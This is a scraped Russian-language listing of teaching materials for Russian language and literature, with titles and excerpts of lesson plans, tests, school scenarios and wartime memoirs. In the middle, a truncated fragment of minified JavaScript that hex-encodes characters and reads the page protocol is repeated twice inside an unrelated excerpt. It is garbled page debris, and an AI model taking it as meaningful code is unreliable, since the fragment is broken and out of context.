Русский язык и Литература

  • Методические рекомендации по русскому языку (игровые технологии)
  • Рабочая программа по литературе для обучаюшихся СПО
  • Проект как вид контроля знаний в системе требований по ФГОС
  • Открытый урок на тему: 21 век: толерантность, а не конфликтность. (Проблемы современного мира в публицистических текстах на уроках русского языка)
  • Сборник текстов и заданий по русскому языку (для развития речи)
  • План мероприятий, посвященных году литературы в РоссииВ целях привлечения внимания общества к чтению и литературе 2015 год объявлен в России Годом литературы (Указ №426 от 12 июня 2014 года президента Российской Федерации В.В.Путина). В школе была создана инициативная рабочая группа по подготовке плана мероприятий, посвященных Году литературы. В работу включились все учителя-филологи и классные руководители.
  • Статья Перечитывая Ильина АбрамоваКак верно, удивительно тонко показал Никита Сергеевич Михалков в фильме Солнечный удар истоки зарождения духовной пустоты, равнодушной бесчеловечной жестокости в предреволюционный период, вылившейся потом в кровавую вакханалию победителей. Вопрос: Как все это случилось,- рефреном проходящий через весь фильм, перекликается с той беспечной, кажется, ничего страшного не несущей в себе для молодого влюбленного офицера фразой, подтверждающей пока сомнения мальчишки, очень обстоятельного, честн...
  • ФЕ в рассказах Чехова
  • Материал для диспута в старших классахВ статье Ивана Александровича Ильина О революции, написанной в чудовищное послереволюционное время, вошедшей в сборник Кризис безбожия, есть удивительные по своей верности и страшные по своей сути слова: Надо научиться смотреть в глаза сатане. Страшные потому, что практически ничего в мире не изменилось: разгул сатанизма вошел в новую фазу, приобрел еще более изощренные формы и методы, основанные на извечных, свойственных только ему лжи и лицемерии, оправдывающих право на бесчестие ...
  • Разработка уроков литературы по творчеству В. В. Маяковского
  • Рабочая программа Русский язык 1-4 клДанная программа разработана на основе авторской программы Русский язык авторов: В.П.Канакиной, В.Г.Горецкого, М.В.Бойкиной, М.Н.Дементьевой, Н.А.Стефаненко, отвечает требованиям Федерального государственного образовательного стандарта начального общего образования . Предназначена для учителей начальных классов, тематическое планирование прилагается для всех четырёх классов.
  • Дидактический материал на тему сравнение. К ЕГЭ с 5-го классаПо-прежнему трудным для учащихся, сдающих ЕГЭ, остаётся задание на определение выразительных средств языка. Почему? На мой взгляд, потому, что этому вопросу уделяется недостаточно внимания. Предвижу возражения, что в учебниках литературы много заданий на нахождение и определение выразительных средств языка. Да, это так. Но посмотрим на этот вопрос с другой стороны. Возьмём для примера очень распространённое выразительное средство – сравнение. Кажется, что в нём сложного? А сложное как раз в том...
  • Роль человеческого героизма на войне в произведении М. А. Шолохова Судьба человекаНикто не любит войну. Но на протяжении тысячелетий люди страдали и гибли, губили других, жгли и ломали. Завоевать, завладеть, истребить, прибрать к рукам - все это рождалось в жадных умах, как в глубине веков, так и в наши дни. Одна сила сталкивалась с другой. Одни нападали и грабили, другие защищали и старались сохранить. И во время этого противостояния каждый должен был показать все, на что способен. Примеров геройства, мужества, стойкости и храбрости в русской истории достаточно. Это и нашест...
  • Интегрированное логопедическое занятие В поисках волшебных красокИнтегрированное логопедическое занятие с элементами песочной терапии. Цели: v активизировать и обогащать словарь детей существительными, прилагательными и глаголами по теме занятия, развивать связную речь, умение рассуждать, делать выводы; v стимулировать самостоятельное формулирование выводов; v развивать тактильную чувствительность и мелкую моторику рук ребенка; v развивать умственные операции: сравнение, обобщение, способность анализировать; v воспитывать аккуратность при работе с песко...
  • Литературно-музыкальая композиция по творчеству А. С. Пушкина Учитель: Деревня,Болдино в Нижегородской области,- одна из столиц русской поэтической культуры, - пишет Лев Озеров. И в этом нет преувеличения. Вряд ли в творчестве какого-либо другого гения мировой литературы за такой короткий срок отправилось в бессмертие столько произведений. Если б мы располагали только тем , что создано Пушкиным в Болдине, все равно было бы очевидно, что перед нами великий поэт. Сегодня у нас есть прекрасная возможность еще раз прикоснуться к этому чуду - пушкинской бол...
  • Литературно-музыкальная композиция по творчеству Р. РождественскогоУчитель: Не думай о секундах свысока, Наступит время, сам поймешь, наверное, Свистят они, как пули, у виска, Мгновения, мгновения, мгновения… Эти, так хорошо всем знакомые строчки, принадлежат замечательному поэту 20 века Роберту Ивановичу Рождественскому. Жизнь и Смерть, Любовь и Ненависть, Война и Мир, Время и Родина – вот основные темы его стихов. Сегодня мы познакомим вас с Рождественским поэтом и человеком. Итак, наш литературный вечер начинается. Ведущий I. Роберт Иванович Р...
  • Правописание гласных в корне словаУрок по теме Правописание гласных в корне слова предназначен для учащихся 6 класса. Данный материал представляет собой обобщение и систематизацию изученного в 5-ом классе материала по темаморфограммы корня: правописание безударных проверяемых гласных в корне слова, правописание словарных слов и чередующихся корней. Урок строится по принципу урока-повторения: начинается материал с повторения изученного материала, проводится словарная работа( по методике Е.И. Никитиной), словарное слово включ...
  • Интегрированное логопедическое занятие Полет к солнцуИнтегрированное логопедическое занятие для детей младшего школьного возраста. Цели: расширить представления детей о Вселенной. Задачи: Образовательные: - уточнение представление детей о космосе, звездах созвездиях, звездной пыли; - закрепление названия геометрических фигур: треугольник, квадрат, круг, прямоугольник; - упражнять в счете в пределах десяти. Развивающие: - развитие фантазии, воображения; - развитие мыслительной и речевой деятельности, зрительного внимания и восприятия; - разви...
  • Урок литературы на тему Народные характеры и народный быт в повести Н. В. Гоголя Ночь перед РождествомУрок литературы в 5 классе на тему Народные характеры и народный быт в повести Н. В. Гоголя Ночь перед Рождеством необычен тем ,что проходил не в классе ,а в школьной музейной комнате Светлица ,где собраны предметы быта украинского народа.Уроку предшествовало домашнее задание:составить словарик предметов украинского быта, ( по тексту повести) , собрать материал для характеристики по данному плану Оксаны,Вакулы(по вариантам), также индивидуальные задания -выразительное чтение эпизодов (в том...
  • Исследовательская работа на темуСвязь юмора с языкомВведение. Всем нам известно, что хорошее чувство юмора продлевает жизнь. Много смеяться – значит быть здоровым и счастливым. Юмор помогает сохранять хорошее настроение, заряжает оптимизмом. Мои близкие подруги считают, что веселая шутка или свежий анекдот – всегда хороший подарок. И я в этом вполне с ними согласна. Мы любим пошутить и посмеяться, когда встречаемся. Народная пословица гласит: Смех без причины – признак дурачины. Посмеяться можно, когда смешно. А когда бывает смешно? Какие сит...
  • Урок по русскому языку на тему Имя прилагательное как часть речиЦели и задачи: · повторение и обобщение знаний учащихся по теме Имя прилагательное; развитие орфографической зоркости и навыков использования прилагательных в речи, монологического ответа, логического и аналитического мышления; развитие творческих способностей учащихся, умений создавать проекты; воспитание чувства коллективизма, умения работать в группе. Тип урока: обобщение и закрепление пройденного материала Вид урока: урок – семинар Методы: частично – поисковый, метод проек...
  • Методические рекомендации Поиск оптимальных методов качественной подготовки учащихся к ЕНТ по русскому языкуВ системе работы учителя сложился достаточно отрегулированный механизм контроля, отслеживающий и корректирующий качественную подготовку к ЕНТ. Он включает следующие шаги:1. Стартовый контроль в начале учебного года в 11 классе за курс основной школы на определение базовых компетенций школьника. 3. Составление учителем планов коррекционной работы и планов подготовки к ЕНТ.4. Периодические комплексные тестирования учащихся 11 класса с обязательным анализом и коррекционной деятельностью учителя и с...
  • Использование здоровьесберегающих технологий в учебно-воспитательном процессеПсихолого-педагогические технологии здоровьясбережения также применяются в моей педагогической деятельности. Для снятия эмеционального напряжения использую игровые технологии, оригинальные задания. Это способствует созданию благоприятного психологического климата на уроке. В обстановке психологического комфорта и эмоциональной приподнятости работоспособность класса заметно повышается, что в конечном итоге приводит и к более качественному усвоению знаний, к более высоким результатам. Этому же спо... // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(http)==0){return p}for(var e=0;e // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(http)==0){return p}for(var e=0;e
  • Сочинение как основной вид творческой деятельности при обучении русскому языку Современная жизнь требует от человека подвижности мышления, творческого подхода к решению задач. Развитие творческих способностей обучающихся происходит в процессе обучения, в частности на уроках русского языка. Задача учителя словесности – пробудить интерес обучающихся к творчеству, развить их творческие способности. Необходимо разработать и внедрить в практическую деятельность систему форм, методов и приемов работы по развитию у учеников творческих способностей. В развит...
  • Сочинение как основной вид творческой деятельности при обучении русскому языкуСочинение как основной вид творческой деятельности при обучении русскому языку Современная жизнь требует от человека подвижности мышления, творческого подхода к решению задач. Развитие творческих способностей обучающихся происходит в процессе обучения, в частности на уроках русского языка. Задача учителя словесности – пробудить интерес обучающихся к творчеству, развить их творческие способности. Необходимо разработат...
  • Урок по поэме А. ТвардовскогоУрок Ради хизни на земле по поэме А. Т. Твардовского Василий Теркин был проведен на заключительном этапе изучения произведения как обобщение знаний о прочитанном. В ходе урока решались следующие задачи: пополнить знания учащихся о жизни и творчестве поэта, об истории создания поэмы и об особенностях ее композиции, о главном герое, способствовать формированию у них представления о войне ; развивать монологическую речь и образное мышление, умение работать с Интернет ресурсами, навыки составле...
  • Урок по рассказу Е. И. Носова Живое пламяУрок Мыэтой памяти верны по рассказу Евгения Ивановича Носова Живое пламя был проведен в седьмом классе. Его цель -- донести до учащихся мысль автора о высоком предназначении человека, священной памяти о погибших на войне. Задачи урока -- познакомить учащихся с основными этапами жизни и творчества писателя,уяснить содержание рассказа, показать его художественные особенности; способствовать развитию речи и выразительного чтения, навыков анализа художественного произведения; воспитывать у шк...
  • План урока по литературе на темуПлан урока разработан по поэме Н.В.Гоголя Мёртвые души. Занятие включает в себя различные виды работ. Основная роль на уроке принадлежит ученикам, учитель лишь направляет действия ребят. Вначале урока создается коллаборативная среда. Коллаборативный класс представляет собой класс, в котором учитель понимает меру своей ответственности, не ограниченной лишь рамками преподаваемого предмета/содержания обучения. Успешность обучения и преподавания заключается в создании атмосферы, позволяющей личн... Внимательность, сдержанность Непосредственность, независимость Мы думаем о том, что мы делаем Мы можем экспериментировать Мы внимательны к себе, другим и к миру Мы можем свободно задавать вопросы и подвергать что-либо сомнению Мы работаем в обществе, которое имеет правила, законы и ограничения Знание правил даёт нам больше выбора и больше свободы У нас есть традиции и основы, согласно которым мы формируемся Мы – индивидуальности, наши различия – это наша сила Мы допускаем, что не обо всём знаем То, о чём мы имеем представления, связано с тем, что мы знаем Мы наделены правом получения знаний, обеспечивающих нам силу Наш опыт влияет на наше обучение, понимание и формирование Затем ребята работают по предложенным заданиям в сменных группах. Особенность оценивания результатов учеников состоит в том, что они это делают самостоятельно, учитель лишь подводит итог в конце урока.
  • Стихи на разные темы. ИзбранноеИногда сочиняю стихи, когда находит вдохновение и есть тема. Особенно пишется осенью, когда идёт дождь.Как и великий Пушкин, очень её люблю. ОПЯТЬ СТЕНА. Стена, опять она... И как прочна: Не перелезть и не достать, И даже если выше стать. А я шепчу: Я дотянусь, Лишь ото сна очнусь. В нем : я - с тобой, В нем: я - твоя; Готова стать рабой День ото дня. И мне нисколечко не стыдно, Не грех, и не обидно, Потому что - для тебя. А ты - святее всех святых! Сгорю, тебя любя, И нет мне дела...
  • Урок развития речи Что в имени тебе моем?Я думаю, что не ошибусь, если скажу, что для каждого человека его собственное имя очень значимо и ,как правило, любимо. Меня заинтересовала эта тема очень давно, была мысль подготовить интересный классный час по этой теме. Но раздел русского языка под названием Лексика оказался еще интереснее: ономастика (наука об именах) и антропонимика (наука о человеческих именах) входят в этот раздел. Поэтому данный урок все-таки относится большей частью к лексике русского языка. На уроке ребята знакомятся...
  • Литературная гостиная Дети войны22 июня 1941. Зловещие языки пламени, рвущиеся ввысь и испепеляющие всё, что встаёт на их пути. Искажённые ужасом лица женщин, прижимающих к груди насмерть перепуганных детей. Душераздирающие стоны раненых. Грохот орудий. Свист пуль. И… всюду трупы людей, которые ещё недавно думали о будущем, мечтали о любви и счастье. Всё это и есть война – самое страшное событие, которое только может случиться как в жизни отдельного человека, так и в истории всего человечества. Что может быть страшнее, чем...
  • Театрализованное представление. Горе-читатель на литературном балуТеатрализованное представление. Горе-читатель на литературном балу. Голос за сценой (Читатель выходит на сцену) Не за синими морями, в нашей школе, рядом с нами Жил-был Петя-ученик, лоботряс и озорник. Забывал про все на свете, наш знакомый мальчик Петя. Не старался, не учился, все баклуши бил, ленился. Он скучал, вздыхал украдкой над учебником с тетрадкой. И томясь от страшной скуки, ненавидел все науки. Заявлял он всем открыто, что на школу он сердитый, Что уроки надоели… Он ругал учителей, ...
  • Конспект урока Никто не забыт(обзорная экскурсия по военно-творческому пути Ю.А.Степняка) Составила: учитель МБОУ средней общеобразовательной школы №60 Ленинского района г. Нижнего Новгорода Маслова Ирина Васильевна, учитель высшей категории. Урок составлен на материалах, полученных от родственников Ю.А.Пуговкина. Цели и задачи: Обучающие: формировать коммуникативные умения учащихся (умения правильно выражать свои мысли, совершенствовать высказывания); познакомить учащихся с творчеством Ю.А.Степняка; познакомить учащихся с биографическими данными поэта; продолжить знакомство с периодом 1941–1945 гг. в истории нашей Родины; Развивающие: совершенствовать речь учащихся для их успешного обучения и адаптации в обществе; развивать навыки выразительного чтения, речевого этикета. Воспитывающие: продолжать воспитывать у учащихся чувство патриотизма, гражданского долга; продолжать воспитывать у учащихся чувство гордости за героическое прошлое нашей страны; формировать бережное отношение и любовь к русскому языку.
  • Инновационные приемы на уроках русского языка и литературыНародная мудрость гласит: Познай самого себя - ты познаешь весь мир. Действительно, человек сам себя не знает, не знает, на что он способен. По мнению ученых, каждый из нас рождается в мир с печатью какого- либо таланта. Нужно лишь суметь раскрыть эти способности и развить их. Значит, и каждый ребенок имеет право на творчество. Что отличает творческую деятельность? Как определить уровень креативности? Для выявления творческих способностей учащихся я использую следующие составляющие творческ...
  • Тест по роману В. НабоковаМашенька — первый роман В.В.Набокова написан в берлинский период в 1926 на русском языке. Роман изучается как дополнение к программе или в формате самостоятельной подготовки. Тест предполагает ряд заданий с одним верным вариантом ответа или с несколькими (произведения Набокова,описание героев, место действия, причины поступков) и ряд заданий, предполагающих развернутый ответ. Результаты теста помогут проверить знания по тексту произведения, а также оценить творческие способности, умение рассу...
  • Задания по русскому языку на тему МестоимениеВ данной методической разработке представлены задания для освоения такой части речи, как местоимение. Тест разбит на 4 группы заданий - в 1 группе нужно выбрать правильный вариант ответа, во 2 правильно восстановить соответствия, в 3 группе правильно закончить фразу, в 4 верно ответить на поставленный вопрос. Вопросы составлены таким образом, чтобы обучающийся мог показать свои знания по данной теме, а также тщательно поразмыслить, включить логику, применить твореческие и исследовательские спос...
  • Проверочная работа по повести Б. Васильева А зори здесь тихиеПроверочная работа рассчитана на обучающихся старших классов для проверки знания литературного текста А зори здесь тихие Б.Васильева. В данной работе представлены задания открытого типа, ребятам предлагается перечислить имена героев, основные даты, рассказать о жизни зенитчиц до войны и на войне (всего их 14). В последнем задании предлагается написать эссе на тему Не для войны рождаются девочки. Вопросы составлены таким образом, чтобы обучающийся мог поразмыслить, вспомнить другие примеры из...
  • Викторина тема: Имя числительноеДанная викторина предназначена для урока русского языка, при закреплении и повторении темы имя числительноев 6 классе, также при подготовке к ЕНТ. Викторина Имя числительное 1. Какой падеж является начальной формой числительного ? 2. Слова тысяча, …, миллиард, обозначающие отвлеченные числа и количество предметов, по своим основным морфологическим признакам относятся к существительным. 3. Числительное тысяча во мн.ч Р.п 4. Простые, сложные, составные … 5. Простое числительное, состоящее из одного слова и одной основ 6. Порядковое числительное отвечающий на вопрос КАКОЙ? 7. ...
  • Доклад по русскому языку на тему Развитие орфографической зоркости в начальных классах С точки зрения фонематической концепции русского правописания, орфографическая зоркость – это умение фонологически (позиционно) оценивать каждый звук слова, т.е. различать, какой звук в сильной позиции, а какой – в слабой, и, следовательно, какой однозначно указывает на букву, а какой может быть обозначен разными буквами при том же звучании. В умении обнаруживать звук, находящийся в слабой позиции, прежде всего и состоит орфографическая зоркость. Орфографическая зоркость развивается постепенно,...
  • Театрализованная биография Булгакова (сценарий) Михаил Афанасьевич Булгаков заслуженно занял почетное место в отечественной литературе как мастер, умноживший ее величие и славу. В судьбе всякого самобытного писателя имеется некая тайна, разгадывать которую приходится ему самому – своей жизнью, творчеством. Потом, после смерти творца, появляются ученые-биографы и по книгам, рукописям, письмам и мемуарам начинают воссоздавать сложную канву человеческой жизни, пытаясь заново разгадать эту тайну... Перед вами театрализованный урок по творчест...
  • Урок-практикум Тема: «Старославянизмы в современном русском языке, их аналоги в других славянских языках»Это конспект урока-практикума, разработанный в рамках проекта Организация и проведение открытых уроков в образовательных учреждениях РФ, посвященных Дню славянской письменности и культуры. Цель: Задачи: Продвижени­е, сохранение­ и поддержка развития русского языка как общенацион­ального достояния народов Российской­ Федерации,­ средства международ­ного общения и неотъемлем­ой части культурног­о и духовного наследия мировой цивилизаци­и. Продемонстрировать учащимся историко-культурную взаимосвязь славянских народов. Научить учащихся видеть следы старославянского языка в современном русском языке. Углубить знания о корнях русского языка, дать понятие старославянизмов; научиться находить за...
  • Рассказ На Берлинском направленииА.И. Просветов воевал в составе 95 стрелкового полка 33-й армии 1-го Белорусского фронта.Командовал фронтом тогда К.К. Рокоссовский, а затем - прославленный полководец Г.К.- В конце сентября 1944 года, - вспоминает ветеран, - войска 1-го Белорусского фронта находились под Варшавой. Немцы сопротивлялись упорно, и только 17 января наши войска освободили столицу Польши. - Страшная картина открылась нам, когда мы вступили в Варшаву. Польская столица представляла собой груду развалин… Но ни мощная об...
  • Упражнение 1 по русскому языку на ПК (деепричастие, предлог) Упражнение Вставвьте слова не смотря несмотря Укажи часть речи деепричастие предлог Отвечал, в книгу ; 2 2 2 2 собрали хороший урожай ; 2 2 2 2 судно вышло в море на не погоду ; 2 2 2 2 поднимались по склону вниз ; 2 2 2 2 принялись за работу, на усталость ; 2 2 говорил с отцом на него ; ...
  • Воспитание счастьем, счастье воспитания (педагогическая технология воспитания счастливого человека в школе)Москва, 2010 год, курсы в Академии последипломного образования. По привычке зашла в книжный магазин. Молодой педагог, листая страницы небольшой книжечки, вдруг громко произнёс, обращаясь сразу ко всем покупателям, такие слова: Как хорошо, что учёные- педагоги стали писать про счастье. Почему-то захотелось приобрести именно это издание. Так в моей библиотеке появилась первая книга о феликсологии как педагогической технологии воспитания счастливого человека в школе. Сейчас очень востребовано выр...
  • Конспект урока. Тема урока: Поэты «Серебряного века»Конспект урока. Тема урока: Поэты Серебряного века. Цель: приобщить обучающихся к искусству слова, богатству русской классической литературы; ввести обучающихся в необыкновенный мир поэзии Серебряного века. Задачи: Образовательные: · Углубить полученные знания путем подготовки сообщений о творчестве поэтов и связать все выступления таким образом, чтобы у учащихся сложилось целостное впечатление о поэзии Серебряного века. Развивающие: · Развивать мышление обучающихся, обуч...
  • Мои инновации в работеЯ - учитель русского языка и литературы. Мне повезло: ведь я занимаюсь любимым делом. Я люблю работать творчески. Мне нравится что-то искать, находить, открывать новое для себя, придумывать самой и учить детей фантазировать, мыслить, познавать глубже и всесторонне этот чудесный мир. Одним словом, созидать. Эта потребность в самовыражении, проявление интеллекта и нравственных начал, воплощение индивидуальности и называется творчеством. Как нужны сегодняшнему времени перемен люди-творцы, самос...
  • Воплощение различных типов эпилептоидного сознания в романе “Преступление и наказание” Ф. М. ДостоевскогоСовершение преступления вводит Раскольникова в состояние паранойи. Он безмерно начинает подозревать свое окружение в попытке его обмануть, поймать. После убийства мысль о наказании его не покидает, как бы он ни старался от нее избавиться. Все беседы с Порфирием Петровичем сводятся к психологическому поединку, во время которого появляются детали убийства. И в итоге получается, что именно тот период после убийства, который Раскольников был на свободе, является наказанием. Прощением же и очищением ...
  • Презентация. Музейный урок для начальной школы Что можно увидеть и о чём узнать в музее?Музей- идельное место, где можно на себе ощутить связь времён,связь поколений, историю веков. Но, к сожалению, не все дети имеют возможность посещать музеи. Однако выход есть - это школьные музеи и мини-музеи. Данная презентация подготовлена к вводному интегрированному занятию, на котором учащимся начальных классов впервые предстоит отправиться в заочное путешествие по залам разных музеев.Это будет первым открытием для маленьких экскурсантов. На музейном занятии использованы игровые т...
  • Рассказ Воспоминания ветерана ВОВРассказ посвящается моей маме Балабановой М.Н., ветерану Великой Отечественной войны , служившей в действующей Красной Армии в отдельном Зенитном Артиллерийском дивизионе ПВО, воинской части № 682. Моя мама – ветеран Великой Отечественной войны. Однажды я попросила её рассказать о событиях тех далеких лет. Она тяжело вздохнула и ответила, что ей грустно и больно вспоминать об этом. Война лишила ее матери, отняла молодость. А можно ли забыть, как голодали маленькие сестры, тяжело был ранен бр...
  • Образцы сочинений 15. 3 в формате ОГЭ-2015 по всем темам с фипиОпыт показывает, какие затруднения испытывают девятиклассники при подготовке к написанию сочинения по требованиям ОГЭ. Но если предложить им качественные образцы, основываясь при этом на задания Банка данных ОГЭ ФИПИ, то работа здорово упрощается. По данным образцам сочинений 15.3 в формате ОГЭ-2015 по всем темам с фипи даже самые слабые учащиеся смогли создавать свои работы. Все сочинения ученические , но откорректированы и отредактированы учителем и на экзамене 2015 прошли экспертную проверку:...
© 2010-2018